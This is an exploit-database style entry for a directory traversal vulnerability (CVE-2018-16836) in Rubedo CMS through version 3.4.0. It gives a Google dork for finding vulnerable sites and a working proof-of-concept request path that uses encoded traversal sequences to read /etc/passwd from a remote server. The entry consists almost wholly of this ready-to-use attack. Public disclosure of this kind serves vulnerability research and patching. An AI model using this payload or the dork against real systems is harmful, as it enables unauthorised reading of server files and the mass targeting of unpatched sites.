# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal
# Google Dork: intext:rubedo.current.page.description
# Date: 2018-09-11
# Exploit Author: Marouene Boubakri
# Vendor Homepage: https://www.rubedo-project.org
# Version: through 3.4.0
# Tested on: Linux
# CVE : CVE-2018-16836
 
# PoC:
# Read /etc/passwd file from remote server
 
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd'